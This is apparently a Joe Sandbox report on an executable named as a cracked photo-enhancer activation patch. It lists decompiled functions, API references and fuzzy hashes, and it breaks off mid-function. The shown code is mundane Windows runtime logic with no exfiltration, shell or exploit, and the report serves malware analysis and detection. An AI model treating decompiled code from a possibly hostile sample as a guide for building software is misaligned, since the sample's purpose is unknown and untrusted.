Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 8af83935ca987eeebb979c0a6a94b74e9f9155cd6b79be10dcadafa6e5b8a04f
Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
Opcode Fuzzy Hash: 8af83935ca987eeebb979c0a6a94b74e9f9155cd6b79be10dcadafa6e5b8a04f
Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1

Uniqueness

Uniqueness Score: -1.00%

Function 00414B0C Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00414B0C(intOrPtr* __eax, intOrPtr* __edx) {

				_push( *((intOrPtr*)(__edx + 8)) -  *__edx);
				_push( *((intOrPtr*)(__edx + 0xc)) -  *((intOrPtr*)(__edx + 4)));
				return  *((intOrPtr*)( *__eax + 0x4c))();
			}

0x00414b19
0x00414b22
0x00414b32

APIs

KiUserCallbackDispatcher.NTDLL(00498852,?,00498874,?,?,00000000,00498852,?,?), ref: 00414B2B

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 004073A0 Relevance: 1.5, APIs: 1, Instructions: 23
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004073A0(void* __eax, long __ecx, void* __edx) {
				long _v16;
				int _t4;

				_push(__ecx);
				_t4 = WriteFile(__eax, __edx, __ecx,  &_v16, 0); // executed
				if(_t4 == 0) {
					_v16 = 0xffffffff;
				}
				return _v16;
			}

0x004073a3
0x004073b4
0x004073bb
0x004073bd
0x004073bd
0x004073cb

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004073B4

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 2f8daafde9b26fef92e1aa5bd659357c1cc7a27540311c84a238762a8e37efbc
Instruction ID: 517e21fc39e357fcc75414f86969db1bfc0739985e912eef881c3d4632b4c6ac
Opcode Fuzzy Hash: 2f8daafde9b26fef92e1aa5bd659357c1cc7a27540311c84a238762a8e37efbc
Instruction Fuzzy Hash: 74D012723181506AE220A55A5C44EAB6EDCCBC5770F10063AB958D21C1D6309C01C675

Uniqueness

Uniqueness Score: -1.00%

Function 00423ADC Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00423ADC(struct HWND__* __eax, int __edx, void* __eflags) {
				int _t3;
				void* _t8;
				int _t10;
				struct HWND__* _t11;

				_t10 = __edx;
				_t11 = __eax;
				_t8 = E00423A88();
				if(_t8 != 0) {
					E00423AB8(0);
				}
				_t3 = ShowWindow(_t11, _t10); // executed
				if(_t8 != 0) {
					return E00423AB8(1);
				}
				return _t3;
			}

0x00423adf
0x00423ae1
0x00423ae8
0x00423aec
0x00423af0
0x00423af0
0x00423af7
0x00423afe
0x00000000
0x00423b02
0x00423b0a

APIs

Part of subcall function 00423A88: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 00423A9D

ShowWindow.USER32(004108F0,00000009,?,00000000,0041F234,00423DCA,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00423AF7

Part of subcall function 00423AB8: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423AD4

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: InfoParametersSystem$ShowWindow
String ID:
API String ID: 3202724764-0
Opcode ID: 6c97eab4d5f35d9e0c4c492f0780e1f33e5a1e11612eb1c0cb2b18762b4c2d00
Instruction ID: a4d1e59934daad15499cd62f29d800d7a8388f589a5efdc182870931650505b7
Opcode Fuzzy Hash: 6c97eab4d5f35d9e0c4c492f0780e1f33e5a1e11612eb1c0cb2b18762b4c2d00
Instruction Fuzzy Hash: 81D05B127411702102107A7B2405A8B45AC4D9225B384047BB48097303D95D4D0552A8

Uniqueness

Uniqueness Score: -1.00%

Function 00424754 Relevance: 1.5, APIs: 1, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00424754(void* __eax, void* __edx, void* __edi) {
				void* __ebx;
				void* __esi;
				int _t10;

				_t11 = __eax;
				if( *((char*)(__eax + 0x7e)) == 0) {
					_t3 = _t11 + 0x6c; // 0x225247c
					return E00403450(_t3, __eax, __edx, __edi, __edx);
				} else {
					_t10 = SetWindowTextA( *(_t11 + 0x20), E00403738(__edx)); // executed
					return _t10;
				}
			}

0x00424758
0x0042475e
0x00424774
0x00424780
0x00424760
0x0042476c
0x00424773
0x00424773

APIs

SetWindowTextA.USER32(?,00000000), ref: 0042476C

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 805f3cc7500933323b9257a6a261a55e12d82397c97f56fe04234c9d564d4e6f
Instruction ID: 9eeed77ebbf23638ebb637759628e88e4fff7ef3ebed755505968d13fb2e7b10
Opcode Fuzzy Hash: 805f3cc7500933323b9257a6a261a55e12d82397c97f56fe04234c9d564d4e6f
Instruction Fuzzy Hash: 44D05EE2B011702BCB01BAAD54C4AC667CC8B8925AB1940BBF904EF257C738CE408398

Uniqueness

Uniqueness Score: -1.00%

Function 0042D1B4 Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042D1B4(void* __eax) {
				signed char _t5;

				_t5 = GetFileAttributesA(E00403738(__eax)); // executed
				if(_t5 == 0xffffffff || (_t5 & 0x00000010) != 0) {
					return 0;
				} else {
					return 1;
				}
			}

0x0042d1bf
0x0042d1c7
0x0042d1d0
0x0042d1d1
0x0042d1d4
0x0042d1d4

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,00451DA3,00000000), ref: 0042D1BF

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: edecd2973abb1a87aacb4b7103d0c28639b492f0686a1453dc354fd5429015d1
Instruction ID: de8bff456184001464f3abbdb54ffbc0c147f56bb2634b1a4235557a7056eb2a
Opcode Fuzzy Hash: edecd2973abb1a87aacb4b7103d0c28639b492f0686a1453dc354fd5429015d1
Instruction Fuzzy Hash: 81C08CE0712210169E10A5BD2CC652B02C84A5833A3A40A37B429E66E2D23D88662029

Uniqueness

Uniqueness Score: -1.00%

Function 00407350 Relevance: 1.5, APIs: 1, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407350(void* __eax) {
				void* _t4;

				_t4 = CreateFileA(E00403738(__eax), 0xc0000000, 0, 0, 2, 0x80, 0); // executed
				return _t4;
			}

0x0040736d
0x00407373

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040AB64,0040D110,?,00000000,?), ref: 0040736D

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c5e72e818eea8d943971d170bd663bc7876837d772fabd95408c822716423010
Instruction ID: a78e408fffc15bc8d0ee8a54c686fbaa4e2694f5c3f88f37cecd524e454749ad
Opcode Fuzzy Hash: c5e72e818eea8d943971d170bd663bc7876837d772fabd95408c822716423010
Instruction Fuzzy Hash: ADC048B13C130032F93025A61C87F1604889714B1AE60943AB740BE1C2D8E9A818016C

Uniqueness

Uniqueness Score: -1.00%

Function 0041F82C Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,00000000), ref: 0041F840

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: aa2ab5d04534ce78fd06398472ac87fc8e200d4b6eb1d54961e47d4e7a3c3f50
Instruction ID: 48f25c4fc7afed193c39a16cc91a0304f94a1296cd048c63733264e3b5f0309e
Opcode Fuzzy Hash: aa2ab5d04534ce78fd06398472ac87fc8e200d4b6eb1d54961e47d4e7a3c3f50
Instruction Fuzzy Hash: D2D0C932100108AFDB018E94AC018677B69EB48210B148815FD0485221D633E831AA91

Uniqueness

Uniqueness Score: -1.00%

Function 0042E87F Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0042E87F() {
				int _t4;
				intOrPtr _t7;
				void* _t8;

				_pop(_t7);
				 *[fs:eax] = _t7;
				_push(E0042E89D);
				_t4 = SetErrorMode( *(_t8 - 0xc)); // executed
				return _t4;
			}

0x0042e881
0x0042e884
0x0042e887
0x0042e890
0x0042e895

APIs

SetErrorMode.KERNEL32(?,0042E89D), ref: 0042E890

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 3f5ca8107a421579e24e876ed9f2491131596575bec673942313541f3fe4ade1
Instruction ID: 8695c582b33247a37f73f24666a6b5554d32f9d966171ece6814e81b39e17e84
Opcode Fuzzy Hash: 3f5ca8107a421579e24e876ed9f2491131596575bec673942313541f3fe4ade1
Instruction Fuzzy Hash: 49B09B76F0C6005DF705DAD5745552D67D4D7C57203E14977F150D35C0D53C5800491C

Uniqueness

Uniqueness Score: -1.00%

Function 00416A7C Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416A7C(void* __eax) {
				int _t4;

				_t4 = DestroyWindow( *(__eax + 0xc0)); // executed
				return _t4;
			}

0x00416a83
0x00416a88

APIs

DestroyWindow.USER32(?), ref: 00416A83

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: DestroyWindow
String ID:
API String ID: 3375834691-0
Opcode ID: 9d6690cf9d3310b1ea67583473288d09d9a8b553081644455fd58860a5b2f519
Instruction ID: 444a78761fbc6a727879d8c4239369b0bde5fc0390465f01f64749401816922a
Opcode Fuzzy Hash: 9d6690cf9d3310b1ea67583473288d09d9a8b553081644455fd58860a5b2f519
Instruction Fuzzy Hash: CDA002756015049ADE04A7A5C849F662298BB44204FC915F971449B092C53C99008E58

Uniqueness

Uniqueness Score: -1.00%

Function 00401678 Relevance: 1.3, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401678(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x49e440; // 0x5daffc
				while(_t29 != 0x49e440) {
					_t17 =  *(_t29 + 8);
					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}

0x0040167f
0x00401683
0x0040168a
0x0040169f
0x004016a7
0x004016ad
0x004016b3
0x004016b6
0x004016fa
0x004016be
0x004016c4
0x004016c8
0x004016ca
0x004016ca
0x004016d0
0x004016d2
0x004016d2
0x004016d8
0x004016e5
0x004016ec
0x004016ee
0x004016f4
0x00000000
0x004016f4
0x004016ec
0x004016f8
0x004016f8
0x00401709

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 004016E5

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: aff2556f70d1262ea8aa0f998ff389aa42b85af672f49c2583978676eb246ad2
Instruction ID: e8f6c6bf455e76a3865525374968617353d2b407edd5405141ef39133da3b906
Opcode Fuzzy Hash: aff2556f70d1262ea8aa0f998ff389aa42b85af672f49c2583978676eb246ad2
Instruction Fuzzy Hash: 9711A072A057019FC310CF19CC80A2BB7E5EBC4364F09C93DE598673A4E635AC409649

Uniqueness

Uniqueness Score: -1.00%

Function 0041F854 Relevance: 1.3, APIs: 1, Instructions: 52
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041F854(intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void _t15;
				intOrPtr _t25;
				char* _t26;
				void* _t35;

				if( *0x49e654 == 0) {
					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_t35 = _t14;
					_t15 =  *0x49e650; // 0x2360000
					 *_t35 = _t15;
					_t1 = _t35 + 4; // 0x4
					E00402738(0x49c594, 2, _t1);
					_t2 = _t35 + 5; // 0x5
					 *((intOrPtr*)(_t35 + 6)) = E0041F84C(_t2, E0041F82C);
					_t4 = _t35 + 0xa; // 0xa
					_t26 = _t4;
					do {
						 *_t26 = 0xe8;
						_t5 = _t35 + 4; // 0x4
						 *((intOrPtr*)(_t26 + 1)) = E0041F84C(_t26, _t5);
						 *((intOrPtr*)(_t26 + 5)) =  *0x49e654;
						 *0x49e654 = _t26;
						_t26 = _t26 + 0xd;
					} while (_t26 - _t35 < 0xffc);
					 *0x49e650 = _t35;
				}
				_t25 =  *0x49e654;
				_t8 = _t25 + 5; // 0x6c004108
				 *0x49e654 =  *_t8;
				 *((intOrPtr*)(_t25 + 5)) = _a4;
				 *((intOrPtr*)(_t25 + 9)) = _a8;
				return  *0x49e654;
			}

0x0041f862
0x0041f872
0x0041f877
0x0041f879
0x0041f87e
0x0041f880
0x0041f88d
0x0041f897
0x0041f89f
0x0041f8a2
0x0041f8a2
0x0041f8a5
0x0041f8a5
0x0041f8a8
0x0041f8b2
0x0041f8b7
0x0041f8ba
0x0041f8bc
0x0041f8c3
0x0041f8ca
0x0041f8ca
0x0041f8d2
0x0041f8d4
0x0041f8d7
0x0041f8dc
0x0041f8e2
0x0041f8e9

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041F234,?,00423D1F,0042409C,0041F234), ref: 0041F872

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e9b0f0e9299e17d878422f97f99b00588243c29834ad84fb5cccc8c64114728c
Instruction ID: f08fc093bd3761fae95f56252c9cb4b1dce7b9a4e026fad3115f2fcf1a938b7c
Opcode Fuzzy Hash: e9b0f0e9299e17d878422f97f99b00588243c29834ad84fb5cccc8c64114728c
Instruction Fuzzy Hash: CC115A746007059BDB10EF1AC880B82FBE4EFA9350F10C53AE9588F385D774E849CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040170C Relevance: 1.3, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040170C(void* __eax, void** __ecx, void* __edx) {
				int _t7;
				void* _t9;
				signed int _t14;
				intOrPtr* _t19;
				signed int _t22;
				void** _t23;

				_push(__ecx);
				 *_t23 = __eax + 0x00000fff & 0xfffff000;
				_t22 = __eax + __edx & 0xfffff000;
				 *__ecx =  *_t23;
				_t7 = _t22 -  *_t23;
				__ecx[1] = _t7;
				_t19 =  *0x49e440; // 0x5daffc
				while(_t19 != 0x49e440) {
					_t9 =  *(_t19 + 8);
					_t14 =  *((intOrPtr*)(_t19 + 0xc)) + _t9;
					if(_t9 <  *_t23) {
						_t9 =  *_t23;
					}
					if(_t22 < _t14) {
						_t14 = _t22;
					}
					if(_t14 > _t9) {
						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
						if(_t7 == 0) {
							 *0x49e41c = 2;
						}
					}
					_t19 =  *_t19;
				}
				return _t7;
			}

0x00401710
0x00401721
0x00401728
0x00401731
0x00401735
0x00401738
0x0040173b
0x0040177b
0x00401743
0x00401749
0x0040174e
0x00401750
0x00401750
0x00401755
0x00401757
0x00401757
0x0040175b
0x00401766
0x0040176d
0x0040176f
0x0040176f
0x0040176d
0x00401779
0x00401779
0x00401788

APIs

VirtualFree.KERNEL32(?,?,00004000,?,?,?,00000000,00004003,00401973), ref: 00401766

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 11f6be92898c399badff9446a2108036f08e0859c2581f6b6d69b6d4b53dce9c
Instruction ID: 4f728963ec5fa8eda03367237536c92bed861ff5ff18aa36a9f69eb769fc07b0
Opcode Fuzzy Hash: 11f6be92898c399badff9446a2108036f08e0859c2581f6b6d69b6d4b53dce9c
Instruction Fuzzy Hash: 9301FC766442148FC310DE29DCC0E2677E8D794378F15453EDA85673A1D37A6C0187D9

Uniqueness

Uniqueness Score: -1.00%

Function 00401340 Relevance: 1.3, APIs: 1, Instructions: 34
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401340() {
				intOrPtr* _t4;
				void* _t5;
				void _t6;
				intOrPtr* _t9;
				void* _t12;
				void* _t14;

				if( *0x49e43c != 0) {
					L5:
					_t4 =  *0x49e43c;
					 *0x49e43c =  *_t4;
					return _t4;
				} else {
					_t5 = LocalAlloc(0, 0x644); // executed
					_t12 = _t5;
					if(_t12 != 0) {
						_t6 =  *0x49e438; // 0x5da9e8
						 *_t12 = _t6;
						 *0x49e438 = _t12;
						_t14 = 0;
						do {
							_t2 = (_t14 + _t14) * 8; // 0x4
							_t9 = _t12 + _t2 + 4;
							 *_t9 =  *0x49e43c;
							 *0x49e43c = _t9;
							_t14 = _t14 + 1;
						} while (_t14 != 0x64);
						goto L5;
					} else {
						return 0;
					}
				}
			}

0x0040134a
0x00401386
0x00401386
0x0040138a
0x0040138e
0x0040134c
0x00401353
0x00401358
0x0040135c
0x00401363
0x00401368
0x0040136a
0x00401370
0x00401372
0x00401376
0x00401376
0x0040137c
0x0040137e
0x00401380
0x00401381
0x00000000
0x0040135e
0x00401362
0x00401362
0x0040135c

APIs

LocalAlloc.KERNEL32(00000000,00000644,?,0049E450,004013A3,?,?,00401443,?,?,?,00000000,00004003,00401983), ref: 00401353

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 5712d2456a5c70657260606722268c90ba5ea6029e9afae63aaa89408be14ea2
Instruction ID: ffebfc31ce5e110c1853f263bec794d38bcb1f4ca44e5b50064370e0b14d6dc8
Opcode Fuzzy Hash: 5712d2456a5c70657260606722268c90ba5ea6029e9afae63aaa89408be14ea2
Instruction Fuzzy Hash: DEF05E717012018FE724CF29D880656B7E1EBA9365F20807EE5C5D77A0D3358C418B54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0041F5A8 Relevance: 45.6, APIs: 15, Strings: 11, Instructions: 87
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0041F5A8() {
				int _t1;
				struct HINSTANCE__* _t2;
				intOrPtr _t4;
				struct HINSTANCE__* _t6;
				int _t7;
				struct HINSTANCE__* _t8;
				struct HINSTANCE__* _t10;
				struct HINSTANCE__* _t12;
				struct HINSTANCE__* _t14;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t20;
				struct HINSTANCE__* _t22;
				struct HINSTANCE__* _t24;
				_Unknown_base(*)()* _t25;
				signed int _t27;

				if( *0x49c590 != 0) {
					L10:
					return _t1;
				}
				_t1 = GetVersion();
				_t30 = _t1;
				if(_t1 < 4) {
					_t1 = E00406268(_t30);
					if(_t1 < 0x59) {
						_t27 = SetErrorMode(0x8000);
